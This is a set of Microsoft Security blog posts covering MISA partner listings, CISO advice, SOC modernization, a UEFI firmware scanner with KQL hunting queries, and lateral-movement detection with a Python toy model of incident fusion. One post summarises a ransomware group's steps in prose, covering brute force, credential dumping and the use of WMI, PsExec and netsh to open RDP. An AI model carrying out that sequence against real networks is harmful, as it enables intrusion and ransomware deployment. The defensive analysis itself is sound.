The post Microsoft Intelligent Security Association expands to include managed security service providers appeared first on Microsoft Security.

Microsoft Intelligent Security Association expands to include managed security service providers

July 14th, 2020 No comments

We’d planned a splashy party at Microsoft Inspire to announce our newest Microsoft Intelligent Security Association (MISA) members and introduce them to association members, but given our world today, I am instead picturing you reading this announcement curled up in a chair with a cup of coffee. Almost as satisfying, right?

Welcoming Managed Security Service Providers to MISA

Two years ago, we launched MISA to offer our customers holistic solutions that help them better defend against a world of increasing threats. Our vision was to build a robust security ecosystem that included leading security technology companies that provide value to our joint customers. We began by partnering with independent software vendors that have integrated their solutions with Microsoft. Since launch, MISA has expanded significantly—in just the last year, membership increased from 57 members to 133!

Through MISA, we’ve been able to collaborate with some of the most innovative security companies in the world, but our joint customers also need security services that are deeply interwoven with MISA software solutions. To meet this demand, MISA is launching an invitation-only pilot program in July 2020 for select managed security service providers (MSSPs).

“Today we’re happy to bring a win-win-win offering by enabling MSSPs and managed detection and response partners to sell and deploy not just Microsoft’s security solutions but more importantly our joint solutions with our independent software vendor partners.” – Eran Barak, Principal PM Manager, Microsoft Threat Protection.

By including MSSPs in the program, our joint customers will benefit from security consultants with deep expertise in MISA solutions, enabling them to get the most out of their investments. The expansion also creates more opportunities for security organizations to work together on the creative solutions we will need to confront an evolving threat landscape.

“MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”– Mandana Javaheri, Global Director of Cybersecurity Solutions Group at Microsoft Corp.

I am proud of the work that MISA has accomplished to date and look forward to partnering with our newest members to help our joint customers better safeguard their organizations. Please join me in welcoming the following MSSPs to MISA:

Accenture

MISA service offering: Azure Sentinel

Accenture Security helps organizations prepare, protect, detect, respond, and recover across the entire Microsoft Security portfolio and the full security lifecycle. Learn more.

Ascent Solutions

MISA service offering: Azure Sentinel, Azure Security Center

Ascent Solutions’ risk-based defense strategy aligns your priorities with the right technology, processes, and route map to make your business more secure today. And because cybersecurity is at the heart of everything we do, we also help you defend against the right attack vectors and combat malicious actors to better protect your businesses into the future. Learn more.

Avanade

MISA service offering: Azure Sentinel

From enabling a modern workplace, to protecting your applications in the cloud, Avanade provides a holistic approach to security at every step. Learn more. 

BlueVoyant

MISA service offering: Azure Sentinel, Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP)

BlueVoyant provides managed detection and response (MDR) services utilizing Azure Sentinel, a cloud-native security information and event manager (SIEM), and Microsoft Threat Protection, an integrated platform that unifies best-in-class products that include Microsoft Defender ATP, Office 365 Advanced Threat Protection, Azure Advanced Threat Protection, and Microsoft Cloud Application Security. Learn more.

Born in the Cloud

MISA service offering: Azure Sentinel, Azure Security Center

Born In The Cloud leverages Azure Security services including Azure Sentinel and machine learning algorithms to monitor your environment and make sense of the data faster than any human can, allowing us to respond to threats quickly. We also manage Windows 10, Office 365, Microsoft Defender ATP and Microsoft Endpoint Manager for you, to help keep devices, data, and identities safe. All built on Azure Cloud. Learn more.

BT

MISA service offering: Azure Sentinel

One of the few local service providers in managed security services, BT Consulting uses cutting-edge technology to monitor firewalls and manage endpoint security. Learn more.

Critical Start

MISA service offering: Microsoft Defender ATP, Azure Sentinel

CRITICALSTART enables customers to centralize, ingest, and correlate their logs to ensure their environment is secure. CRITICALSTART’s MDR utilizes a Trusted Behavior Registry to investigate every alert generated until it is classified as known good and can be safely resolved. Customers see every action our CYBERSOC analysts take, since our platform provides transparency across the entire process. Learn more.

Cyberproof

MISA service offering: Azure Sentinel

Cyberproof monitors your security alerts and suspicious events, collected from multiple internal and external customer data sources including Microsoft Azure Sentinel SIEM. Threats are detected as they emerge in critical cloud and on-premises infrastructure. Learn more.

Dell

MISA service offering: Microsoft Defender ATP, Azure ATP

At Dell, security is a priority – a part of every conversation; it connects our team members, customers, processes and technologies. Dell’s Security and Trust Center provides easy access to resources and solutions to help you quickly find answers to your security questions. Learn more.

Expel

MISA service offering: Microsoft Defender ATP, Azure Sentinel

The combination of the Expel Workbench™ and Expel analysts monitors your environment 24×7 to provide transparent managed security that finds attackers and gives you the answers to help you kick them out and keep them out. Learn more.

EY

MISA service offering: Microsoft Defender ATP, Azure Security Center

EY provides day-to-day resilience as well as a proactive, pragmatic, and strategic approach that considers risk and security from the onset. This is Security by Design. Rather than avoiding risk altogether, Security by Design is about enabling trust in systems, designs, and data so that organizations can take on more risk, lead transformational change, and innovate with confidence. EY Next-generation security operations and response teams can provide organizations with the right amount of support to help them manage leading-class security operations in a programmatic way. Learn more.

FishTech

MISA service offering: Microsoft Defender ATP

Fishtech is the leading current generation cybersecurity services provider for enabling secure and successful business transformation. Data-driven and born in the cloud, Fishtech provides the people, processes, and technology to minimize risk, maintain compliance, and increase business efficiency. Our human-led, machine-driven security-as-a-service division, CYDERES, helps organizations manage cybersecurity risks, detect threats, and respond to security incidents in real-time. Learn more.

Infosys

MISA service offering: Azure Active Directory, Azure Sentinel

Infosys CyberSecurity offers a flexible managed security services model that empowers organizations with people, processes, and technology to secure their critical assets and data. With our quality services, we help protect your data and infrastructure with the latest technology and certified professionals, while adhering to the latest industry-specific compliance standards. Learn more.

Insight

MISA service offering: Azure Sentinel

Insight Services for Azure Sentinel help you take advantage of cutting-edge technology from Microsoft to strengthen and simplify your security environment. During an engagement, our consultants address all major areas of your SOC, including new tools or processes that would be beneficial to adopt. Learn more.

Inspark

MISA service offering: Azure Sentinel

The new Azure Sentinel and the Fusion capabilities empower Inspark to help keep our customers safe for the future. Our Cloud Security Center incorporates Azure Sentinel and the Microsoft Security Graph into our solution to better protect our customers. Learn more.

KPMG (US & EMEA)

MISA service offering: Azure Sentinel

The KPMG + Azure Sentinel solution has been designed to help businesses improve their security monitoring and incident response capabilities by combining KPMG’s cybersecurity, incident response, and industry experience with Microsoft’s advanced cybersecurity technologies. Learn more.

Open Systems

MISA service offering: Azure Sentinel

Open Systems designed a scalable MDR platform that helps detect threats early to limit the damage. It combines human knowhow, advanced automated threat detection, and the best sensor technology. In addition, a cloud-scale SIEM built on Microsoft Azure Sentinel ensures smooth logfile integration from your existing security controls and other sources of relevant data. Learn more.

Optiv Security

MISA service offering: Microsoft Defender ATP, Azure Sentinel, Azure Active Directory

Optiv Security is a security solutions integrator that enables clients to reduce risk by taking a strategic approach to cybersecurity. Align your security program to achieve specific business outcomes with our full suite of service capabilities, from strategy to technology—and everything in between. Our managed security services provide vetted on-staff vulnerability and security researchers and multiple operations centers to support your organization every moment, of every day, so you can refocus your existing IT staff on core business needs. Learn more.

Truesec

MISA service offering: Microsoft Defender ATP

As a leading cybersecurity consulting company, Truesec offers a wide range of services including security health checks, security engineering, and penetration testing, all provided by cyber security specialists. Our managed service will give your organization the capability to detect and respond quickly to cyberattacks. Our success is based on a combination of extraordinary cyber experts, the most advanced tools in the market today, and by investing in truly understanding the specifics of our client’s IT environments. Learn more.

Trustwave

MISA service offering: Microsoft Defender ATP, Azure Sentinel

Trustwave Threat Detection and Response Services for Microsoft Azure uses Microsoft Security Graph API to ingest data from Microsoft Azure Sentinel and Microsoft Defender ATP to provide real-time triage, analysis, investigation, response, and remediation of security threats. Learn more.

Wipro

MISA service offering: Azure Active Directory, Azure Sentinel

Wipro provides end-to-end security solutions and services for business to enterprise, partners and consumers through Microsoft security stacks. Learn more.

For more information

To learn more about the Microsoft Intelligent Security Association watch this video or visit the webpage. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Intelligent Security Association expands to include managed security service providers appeared first on Microsoft Security.

CISO Stressbusters: Post #2: 4 tips for getting the first 6 months right as a new CISO

June 23rd, 2020 No comments

In your first six months in a new Chief Information Security Officer (CISO) role, you will often be tasked with building a security program. For some of us this is the most exciting part of the job, but it can also be stressful. You’re probably working under a deadline. Plus, it can be difficult to effect change while you’re still learning the corporate culture.

In my role as CISO at Mainstay Technologies, I run a team that is responsible for security for each of our clients. I’ve learned a lot about what it takes to create a security program that’s sustainable in different organization types, sizes and industries. In this post, the second in the CISO Stressbusters series, I’ve distilled my learnings into four tips that you can apply to your own organization.

1. What makes your organization tick?

An effective security program requires participation from people across the organization. If you understand what drives decision-making and behavior, it will help you develop a scalable and sustainable plan that will be implemented and accepted into your culture. Talk with and interview team members at all levels of the organization and across departments to understand the shared values that drive the company. Identify how the organization collaborates, how decisions are made, and what your company’s risk tolerance is.

2. Do you know where all your data is? Are you sure?

Before you can implement a new program, you need to understand your current state and the gap that exists between where you are today and standards that must be met. You may need to lower real-world risk, satisfy compliance demands, or likely, both.

Start by identifying the data privacy laws that you must comply with (e.g., the California Consumer Privacy Act or Massachusetts 201 CMR 17.00) and the compliance frameworks that you may be contractually obligated to adhere to (e.g., DFARS/NIST SP 800-171 or CMMC), or select a standard you will align yourself to (e.g., the NIST Cybersecurity Framework). The data that you are trying to protect must be at the core of a discovery effort. Are you protecting classified information, controlled unclassified information, patient health information, personally identifiable information, etc.? Classify it, then identify how it flows and where it lives. Then build defensive layers to protect it.

A risk assessment should be completed that includes your compliance gap analysis as well as a detailed analysis of internal and external threats and vulnerabilities (technical and organizational). This will also help to generate your risk profile: Risk equals probability multiplied by impact.

It’s also helpful to gather tangible evidence when conducting your assessment. Vulnerability, account control, and role-based access reports should all be standard. During your interviews you may hear about very organized data flows. Run a data discovery scan to see what type of data is actually being stored in which locations. Do you know how well trained your staff is? Think about integrating a red team exercise or include physical security tests. Or consider starting with something basic like phishing tests.

When Mainstay engages with a new client, we interview stakeholders to understand how they manage and protect data, and then we verify. When the assessment is complete, we move into mitigation and remediation strategies. This includes developing plans to close technical, administrative, and physical gaps. If you don’t have written information security policies and a system security plan, this should be evident in your assessment and will be part of your remediation strategy. If you don’t know who is in your building or connected to your network, physical controls, and network access controls should be implemented. We often find that data controls aren’t nearly as strong as people think, so when it comes to assessment the best approach is trust but verify.

Microsoft Defender Advanced Threat Protection (ATP) is a great technical example of software that can help you identify and manage threats and vulnerabilities in your environment.

3. Mind the gap

A thorough risk assessment gives you the data you need to start building your information security program. From there, highlight your gaps and build a remediation roadmap with milestones. Your security posture should improve at each step of the way. Work towards a continuous monitoring strategy. Define where you would like your security program to be in six months vs. two years, align with your stakeholders, and build momentum. Prioritize quick wins that you can close out now to reduce risk immediately.

4. Map everything to the “Why”

Upfront legwork to understand the corporate culture will pay off when it’s time to establish new security policies and training. You will need to embed operational change throughout the organization. To do so requires company buy-in and participation.

Educate executives and business leaders on risk management. Show them how the changes you are recommending will improve ROI. Develop a cross-discipline governance team that reports on cybersecurity risk management at the leadership level. Conduct regular training and check ins to make sure processes are being followed. By distributing the responsibility, you will alleviate the pressure on you and your team, and it will help you build a security culture. A win-win!

Looking ahead

The job of a CISO is stressful. Don’t do it alone. Ally with people in your organization who share your values and can help you achieve your goals. Connect with CISOs from other companies who can commiserate and share advice. And stay tuned for the next CISO Stressbuster post for more advice from other CISOs and security professionals in the trenches.

Did you find these insights helpful? What would you tell your fellow CISOs about overcoming obstacles? What works for you? Please reach out to Diana Kelley on LinkedIn if you’re interested in being interviewed for one of our upcoming posts on CISO insights and stressbusters.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post CISO Stressbusters: Post #2: 4 tips for getting the first 6 months right as a new CISO appeared first on Microsoft Security.

Modernizing the security operations center to better secure a remote workforce

June 22nd, 2020 No comments

The response to COVID-19 has required many security operations centers (SOCs) to rethink how they protect their organizations. With so many employees working remotely, IT groups are routing more traffic directly to cloud apps, rather than through the network. In this model, traditional network security controls aren’t enough. Endpoint signals and identity-based security matter more than ever.

Even under the best circumstances, managing and working in an SOC is stressful—and these aren’t normal times! We know you’re under a lot of pressure, with less visibility and concerns over balancing user productivity without compromising security. But we also know many of the changes companies have made to support remote work during this crisis will remain in place once the virus is gone—some have already announced more flexible and permanent remote work policies. In light of this new reality, the SOC will also need to adjust. In this blog, we’ve outlined some principles of the modern SOC which can guide that transition. You can also hear us discuss these concepts by viewing a replay of the 2020 Microsoft Virtual Security and Compliance Summit.

It’s a multi-cloud world

Odds are good your organization doesn’t use just one cloud. You may manage much of your infrastructure on Microsoft Azure, but you also probably use Amazon Web Services (AWS) or Google Cloud Platform (GCP) too. And when we say cloud, we don’t just mean infrastructure as a service (IaaS). We also mean development work on a platform as a service (PaaS) and software-as-a-service (SaaS) apps hosted in a cloud—although it’s not always clear which cloud it’s hosted on. Without visibility across all platforms where business information is stored and transacted, you don’t have a full view of your corporate security program and risk profile.

Although the major cloud service providers offer tools that let you monitor their environment extensively, you need a holistic view to correlate threats and assess how one threat may impact another resource. Solutions like Microsoft Cloud App Security give you tools to detect cloud apps and monitor and protect them, while Azure Sentinel collects and analyzes data across on-premises and in multiple clouds.

Visibility into all connected devices

As more employees use cloud apps and mobile devices for work, the traditional network security perimeter has lost relevance. This puts greater emphasis on endpoint monitoring and protection. But it goes beyond employee devices. There has been an explosion of the internet of things (IoT) across industries. The industrial internet of things (IIoT) and industrial control systems (ICS) provide yet another opportunity for bad actors to infiltrate your environment. Security platforms like Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can help you prevent, detect, investigate, and respond to threats across all your endpoints. And Microsoft Defender ATP integrates with Microsoft Threat Protection to give you visibility across devices, identity, cloud apps, data, and infrastructure.

Humans and machine learning working together

Part of what makes this job so challenging is the sheer number of endpoints and environments that need to be monitored. Each of those entities produces thousands of alerts—not all of which are legitimate threats. If you are using several security tools that aren’t well integrated, correlating signals across your entire environment is tough. To find the real threats, you may spend hours combing through false positives. Alert fatigue is inevitable, making it easy to miss true issues.

In the modern SOC, artificial intelligence (AI) and machine learning (ML) will be deployed to help people focus on the right problems. If you’re worried that AI and ML will automate you out of a job, “help people” was the most important part of the previous sentence. We believe people are (and will continue to be) a necessary part of cyber defense work. AI and ML are simply not equipped to do the complex problem solving that people do. What AI and ML can do is reduce the noise, so that people can focus on responding to more complex threats and trying to uncover what the humans behind attacks are planning next.

In solutions like Azure Sentinel, AI and ML reason over massive amounts of data to better detect behavior that indicates compromise. Using probabilistic models, such as Markov Chain Monte Carlo simulations, Azure Sentinel takes low-fidelity alerts and combines them into fewer, actionable high-fidelity alerts, increasing the true positive rate and reducing analyst alert fatigue.

Gamification of security training

The core mission of the SOC is to identify compromise rapidly and respond to incidents. In the middle of an attack, minutes matter, so it’s critical that you respond quickly and intelligently. But these are also the moments when adrenaline runs high, and people panic. You may not make the best decisions in a state of high alert. To provide structure during an incident, it helps to have a plan.

A playbook includes a set of processes and steps for various triggers. Written playbooks provide you a reference in the heat of the moment. You can also automate playbooks using the security orchestration, automation, and response (SOAR) capabilities in solutions like Azure Sentinel.

Practicing your plan can help build muscle memory. In tabletop exercises, teams talk through how they would respond to specific scenarios in a low-stress environment. When an actual attack occurs, they draw on these exercises to inform decision making.

To better engage participants, many SOCs are gamifying their training sessions. Capture-the-flag contests divide groups into a red team (the attackers) and a blue team (the defenders) and challenge them to defend (or capture) a computer system. Microsoft’s OneHunt brings together security professionals across the Microsoft organization to conduct a weeklong red team vs. blue team simulation. At the Ignite World Tour, Into the Breach was one of the most popular events. In this game, participants defended a system from an AI-generated attack using Azure Sentinel and Microsoft Threat Protection solutions. Activities like these let teams practice in a fast-moving situation that replicates the experience of a real attack, without the high stakes.

Learn more

It’s been a tough few months for technology teams supporting a rapid migration to remote work. As you begin to modernize your SOC for our new reality, the following resources may help:

For more information about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Diana on LinkedIn or Twitter.

The post Modernizing the security operations center to better secure a remote workforce appeared first on Microsoft Security.

UEFI scanner brings Microsoft Defender ATP protection to a new level

June 17th, 2020 No comments

Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) is extending its protection capabilities to the firmware level with a new Unified Extensible Firmware Interface (UEFI) scanner.

Hardware and firmware-level attacks have continued to rise in recent years, as modern security solutions made persistence and detection evasion on the operating system more difficult. Attackers compromise the boot flow to achieve low-level malware behavior that’s hard to detect, posing a significant risk to an organization’s security posture.

Windows Defender System Guard helps defend against firmware attacks by providing guarantees for secure boot through hardware-backed security features like hypervisor-level attestation and Secure Launch, also known as Dynamic Root of Trust for Measurement (DRTM), which are enabled by default in Secured-core PCs. The new UEFI scan engine in Microsoft Defender ATP expands on these protections by making firmware scanning broadly available.

The UEFI scanner is a new component of the built-in antivirus solution on Windows 10 and gives Microsoft Defender ATP the unique ability to scan inside the firmware file system and perform a security assessment of it. It integrates insights from our partner chipset manufacturers and further expands the comprehensive endpoint protection provided by Microsoft Defender ATP.

How the UEFI scanner in Microsoft Defender ATP works

The new UEFI scanner reads the firmware file system at runtime by interacting with the motherboard chipset. To detect threats, it performs dynamic analysis using multiple new solution components that include:

  • UEFI anti-rootkit, which reaches the firmware through Serial Peripheral Interface (SPI)
  • Full filesystem scanner, which analyzes content inside the firmware
  • Detection engine, which identifies exploits and malicious behaviors

Firmware scanning is orchestrated by runtime events like suspicious driver load and through periodic system scans. Detections are reported in Windows Security, under Protection history.

Screenshot of Windows Security notification showing detection of malicious content in non-volatile memory (NVRAM)

Figure 1. Windows Security notification showing detection of malicious content in non-volatile memory (NVRAM)

Microsoft Defender ATP customers will also see these detections raised as alerts in Microsoft Defender Security Center, empowering security operations teams to investigate and respond to firmware attacks and suspicious activities at the firmware level in their environments.

Screenshot of Microsoft Defender ATP alert for detection of malicious code in firmware

Figure 2. Microsoft Defender ATP alert for detection of malicious code in firmware

Security operations teams can also use the advanced hunting capabilities in Microsoft Defender ATP to hunt for these threats:

// Antivirus detections whose threat name references UEFI
DeviceEvents
| where ActionType == "AntivirusDetection"
| extend ParsedFields = parse_json(AdditionalFields)
| extend ThreatName = tostring(ParsedFields.ThreatName)
| where ThreatName contains_cs "UEFI"   // case-sensitive match
| project ThreatName, FileName, SHA1, DeviceName, Timestamp
| limit 100

To detect unknown threats in SPI flash, signals from the UEFI scanner are analyzed to identify anomalies and where they have been executed. Anomalies are reported to the Microsoft Defender Security Center for investigation.

Screenshot of Microsoft Defender ATP alert for possible malware implant in UEFI file system

Figure 3. Microsoft Defender ATP alert for possible malware implant in UEFI file system

These events can likewise be queried through advanced hunting:

// Alerts whose title mentions UEFI, grouped per device per day
DeviceAlertEvents
| where Title has "UEFI"
| summarize Titles = make_set(Title) by DeviceName, DeviceId, bin(Timestamp, 1d)
| limit 100

How we built the UEFI scanner

The Unified Extensible Firmware Interface (UEFI) is the replacement for legacy BIOS. If the chipset is configured correctly (both the UEFI settings and the chipset configuration itself) and Secure Boot is enabled, the firmware is reasonably well protected. To carry out a hardware-level attack, attackers exploit vulnerable firmware or a misconfigured machine to deploy a rootkit, which gives them a persistent foothold on the machine.

Figure 4. Expected boot flow vs. compromised boot flow

As figure 4 shows, for devices that are configured correctly, the boot path from power-on to OS initialization is reliable. If Secure Boot is disabled or the motherboard chipset is misconfigured, attackers can replace UEFI drivers in the firmware with unsigned or tampered versions. This could allow attackers to take control of the device, giving them the ability to deprivilege the operating system kernel or the antivirus, or to reconfigure the firmware’s own security settings.

Diagram of UEFI platform initialization

Figure 5. UEFI platform initialization

The Serial Peripheral Interface (SPI) flash stores critical platform code. Its layout depends on the OEM’s design, but it commonly includes processor microcode updates, the Intel Management Engine (ME) firmware, and the boot image, which is a UEFI executable. When a computer powers on, the processor executes firmware code directly from SPI flash during UEFI’s SEC phase. Rather than being loaded into RAM first, the flash is permanently mapped into the physical address space so that the x86 reset vector (physical address 0xFFFF_FFF0) falls inside it. However, attackers can interfere with memory accesses to the reset vector from software: on misconfigured devices they reprogram the BIOS control register, which makes it even harder for security software to determine exactly what gets executed during boot.

Once an implant is deployed, it is hard to detect. To catch threats at this level, OS-level security solutions have to rely on information supplied by the firmware itself, so the chain of trust is weakened.

Technically, the firmware is not stored in main memory and is not accessible from it the way ordinary software is. Because it lives in SPI flash storage, the new UEFI scanner must follow the hardware protocol provided by the hardware manufacturers, and to stay compatible and current with all platforms it has to account for protocol differences between them.

Diagram of UEFI scanner internals

Figure 6. UEFI scanner internals overview

The UEFI scanner performs dynamic analysis on the firmware it reads from the hardware flash storage. Having obtained the firmware image, the scanner parses it, which lets Microsoft Defender ATP inspect firmware content at runtime.

Comprehensive security levels up with low-level protections

The new UEFI scanner adds to a rich set of Microsoft technologies that integrate to deliver chip-to-cloud security, from a strong hardware root of trust to cloud-powered security solutions at the OS level.

Hardware backed security features like Secure Launch and device attestation help stop firmware attacks. These features, which are enabled by default in Secured-core PCs, seamlessly integrate with Microsoft Defender ATP to provide comprehensive endpoint protection.

With its UEFI scanner, Microsoft Defender ATP gains even richer visibility into threats at the firmware level, where attackers have been increasingly focusing their efforts. Security operations teams can use this new level of visibility, along with the rich set of detection and response capabilities in Microsoft Defender ATP, to investigate and contain such advanced attacks.

This level of visibility is also available in Microsoft Threat Protection (MTP), which delivers an even broader cross-domain defense that coordinates protection across endpoints, identities, email, and apps.

Kelvin Chan, Shweta Jha, Gowtham Reddy A

Microsoft Defender ATP team

The post UEFI scanner brings Microsoft Defender ATP protection to a new level appeared first on Microsoft Security.

The science behind Microsoft Threat Protection: Attack modeling for finding and stopping evasive ransomware

June 10th, 2020

The linchpin of successful cyberattacks, exemplified by nation state-level attacks and human-operated ransomware, is their ability to find the path of least resistance and progressively move across a compromised network. Determining the full scope and impact of these attacks is one the most critical, but often most challenging, parts of security operations.

To provide security teams with the visibility and solutions to fight cyberattacks, Microsoft Threat Protection (MTP) correlates threat signals across multiple domains and point solutions, including endpoints, identities, data, and applications. This comprehensive visibility allows MTP to coordinate prevention, detection, and response across your Microsoft 365 data.

One of the many ways that MTP delivers on this promise is by providing high-quality consolidation of attack evidence through the concept of incidents. Incidents combine related alerts and attack behaviors within an enterprise. An example of an incident is the consolidation of all behaviors indicating ransomware is present on multiple machines, and connecting lateral movement behavior with initial access via brute force. Another example can be found in the latest MITRE ATT&CK evaluation, where Microsoft Threat Protection automatically correlated 80 distinct alerts into two incidents that mirrored the two attack simulations.

The incident view helps empower defenders to quickly understand and respond to the end-to-end scope of real-world attacks. In this blog we will share details about a data-driven approach for identifying and augmenting incidents with behavioral evidence of lateral movement detected through statistical modeling. This novel approach, an intersection of data science and security expertise, is validated and leveraged by our own Microsoft Threat Experts in identifying and understanding the scope of attacks.

Identifying lateral movement

Attackers move laterally to escalate privileges or to steal information from specific machines in a compromised network. Lateral movement typically involves adversaries attempting to co-opt legitimate management and business operation capabilities, including applications such as Server Message Block (SMB), Windows Management Instrumentation (WMI), Windows Remote Management (WinRM), and Remote Desktop Protocol (RDP). Attackers target these technologies that have legitimate uses in maintaining functionality of a network because they provide ample opportunities to blend in with large volumes of expected telemetry and provide paths to their objectives. More recently, we have observed attackers performing lateral movement, and then using the aforementioned WMI or SMB to deploy ransomware or data-wiping malware to multiple target machines in the network.

A recent attack from the PARINACOTA group, known for human-operated attacks that deploy the Wadhrama ransomware, is notable for its use of multiple methods for lateral movement. After gaining initial access to an internet-facing server via RDP brute force, the attackers searched for additional vulnerable machines in the network by scanning on ports 3389 (RDP), 445 (SMB), and 22 (SSH).

The adversaries downloaded and used Hydra to brute force targets via SMB and SSH. In addition, they used credentials that they stole through credential dumping using Mimikatz to sign into multiple other server machines via Remote Desktop. On all additional machines they were able to access, the attackers performed mainly the same activities, dumping credentials and searching for valuable information.

Notably, the attackers were particularly interested in a server that did not have Remote Desktop enabled. They used WMI in conjunction with PsExec to allow remote desktop connections on the server and then used netsh to disable blocking on port 3389 in the firewall. This allowed the attackers to connect to the server via RDP.

They eventually used this server to deploy ransomware to a huge portion of the organization’s server machine infrastructure. The attack, an example of a human-operated ransomware campaign, crippled much of the organization’s functionality, demonstrating that detecting and mitigating lateral movement is critical.

PARINACOTA ransomware attack chain

Figure 1. PARINACOTA attack with multiple lateral movement methods

A probabilistic approach for inferring lateral movement

Automatically correlating alerts and evidence of lateral movement into distinct incidents requires understanding the full scope of an attack and establishing the links of an attacker’s activities that show movement across a network. Distinguishing malicious attacker activities among the noise of legitimate logons in complex networks can be challenging and time-consuming. Failing to get an aggregated view of all related alerts, assets, investigations, and evidence may limit the action that defenders take to mitigate and fully resolve an attack.

Microsoft Threat Protection uses its unique cross-domain visibility and built-in automation to detect lateral movement. The data-driven approach to detecting lateral movement involves understanding and statistically quantifying behaviors that are observed to be part of one attack chain, for example, credential theft followed by remote connections to other devices and further unexpected or malicious activity.

Dynamic probability models, which are capable of self-learning over time using new information, quantify the likelihood of observing lateral movement given relevant signals. These signals can include the frequency of network connections between endpoints over certain ports, suspicious dropped files, and types of processes that are executed on endpoints. Multiple behavioral models encode different facets of an attack chain by correlating specific behaviors associated with attacks. These models, in combination with anomaly detection, drive the discovery of both known and unknown attacks.

Evidence of lateral movement can be modeled using a graph-based approach, which involves constructing appropriate nodes and edges in the right timeline. Figure 2 depicts a graphical representation of how an attacker might laterally move through a network. The objective of graphing an attack is to discover related subgraphs with high enough confidence to surface for immediate further investigation. Building behavioral models that can accurately compute probabilities of attacks is key to ensuring that confidence is correctly measured and all related events are combined.

Visualization of network with an attacker moving laterally

Figure 2. Visualization of network with an attacker moving laterally (combining incidents 1, 2, 4, 5)

Figure 3 outlines the steps involved for modeling lateral movement and encoding behaviors that are later referenced for augmenting incidents. Through advanced hunting, examples of lateral movement are surfaced, and real attack behaviors are analyzed. Signals are then formed by aggregating telemetry, and behavioral models are defined and computed.

Diagram showing steps for specifying statistical models for detecting lateral movement

Figure 3. Specifying statistical models to detect lateral movement encoding behaviors

Behavioral models are carefully designed by statisticians and threat experts working together to combine best practices from probabilistic reasoning and security, and to precisely reflect the attacker landscape.

With behavioral models specified, the process for incident augmentation proceeds by applying fuzzy mapping to respective behaviors, followed by estimating the likelihood of an attack. For example, if there’s sufficient confidence that the relative likelihood of an attack is higher, including the lateral movement behaviors, then the events are linked. Figure 4 shows the flow of this logic. We have demonstrated that the combination of this modeling with a feedback loop based on expert knowledge and real-world examples accurately discovers attack chains.

Diagram showing steps of algorithm for augmenting incidents using graph inference

Figure 4. Flow of incident augmentation algorithm based on graph inference

Chaining together the flow of this logic in a graph exposes attacks as they traverse a network. Figure 5 shows, for instance, how alerts can be leveraged as nodes and DCOM traffic (TCP port 135) as edges to identify lateral movement across machines. The alerts on these machines can then be fused together into a single incident. Visualizing these edges and nodes in a graph shows how a single compromised machine could allow an attacker to move laterally to three machines, one of which was then used for even further lateral movement.

Diagram showing relevant alerts as an attack move laterally from one machine to other machines

Figure 5. Correlating attacks as they pivot through machines
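The graph inference sketched in Figures 2 to 5 can be made concrete with a small model. The block below is an added example written for this page, not Microsoft’s implementation: devices that raised alerts are nodes, connections over DCOM, SMB and RDP ports are candidate edges, an edge is kept only when it respects the alert timeline and is rare against a constructed per-pair baseline (a stand-in for the “frequency of network connections between endpoints” signal), and the alerts in each connected component are fused into one incident. All device names, times and baseline counts are constructed.

```python
"""Toy incident augmentation by graph inference over lateral-movement edges.

Added example, not Microsoft's code. Nodes are devices that raised alerts;
candidate edges are connections over DCOM (135), SMB (445) or RDP (3389).
An edge is accepted only when (a) the source alerted before the connection
and the destination alerted at or after it, and (b) the (src, dst, port) pair
is rare against a constructed 30-day baseline, the stand-in here for the
"frequency of network connections between endpoints" signal.
"""
import math
from collections import Counter, defaultdict

LATERAL_PORTS = {135: "DCOM", 445: "SMB", 3389: "RDP"}
BASELINE_DAYS = 30

# Constructed baseline: number of days (out of 30) each pair was seen talking.
BASELINE = Counter({
    ("A", "B", 135): 1,
    ("D", "E", 135): 2,
    ("G", "H", 445): 29,   # file-server pair that talks every day: benign
})

# Constructed alerts (device -> alert times, in minutes) and connections in the
# shape of Figure 5: A pivots to B, C and D; D pivots on to E.
ALERTS = {"A": [10], "B": [25], "C": [30], "D": [35], "E": [60], "F": [40], "H": [50]}
CONNECTIONS = [
    {"time": 20, "src": "A", "dst": "B", "port": 135},
    {"time": 22, "src": "A", "dst": "C", "port": 135},
    {"time": 24, "src": "A", "dst": "D", "port": 135},
    {"time": 45, "src": "D", "dst": "E", "port": 135},
    {"time": 48, "src": "G", "dst": "H", "port": 445},   # G never alerted
    {"time": 70, "src": "F", "dst": "E", "port": 3389},  # E alerted before this hop
]


def surprise(src, dst, port, baseline=BASELINE):
    """-log of the Laplace-smoothed daily probability of this pair talking."""
    days = baseline.get((src, dst, port), 0)
    p = (days + 1) / (BASELINE_DAYS + 2)
    return -math.log(p)


def candidate_edges(alerts, connections, threshold=2.0):
    """Accepted lateral-movement edges as (src, dst, port, time, score)."""
    edges = []
    for c in connections:
        if c["port"] not in LATERAL_PORTS:
            continue
        # Timeline check: alert on src before the hop, alert on dst at or after it.
        if not any(t <= c["time"] for t in alerts.get(c["src"], [])):
            continue
        if not any(t >= c["time"] for t in alerts.get(c["dst"], [])):
            continue
        score = surprise(c["src"], c["dst"], c["port"])
        if score >= threshold:
            edges.append((c["src"], c["dst"], c["port"], c["time"], round(score, 2)))
    return edges


def build_incidents(alerts, connections, threshold=2.0):
    """Fuse alerts joined by accepted edges into incidents (connected components)."""
    parent = {d: d for d in alerts}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for src, dst, *_ in candidate_edges(alerts, connections, threshold):
        parent[find(src)] = find(dst)
    groups = defaultdict(set)
    for d in alerts:
        groups[find(d)].add(d)
    # Largest incident first; ties broken by device name for stable output.
    return sorted(groups.values(), key=lambda g: (-len(g), sorted(g)))


if __name__ == "__main__":
    for e in candidate_edges(ALERTS, CONNECTIONS):
        print("edge", e)
    for i, inc in enumerate(build_incidents(ALERTS, CONNECTIONS), 1):
        print(f"incident {i}: {sorted(inc)}")
```

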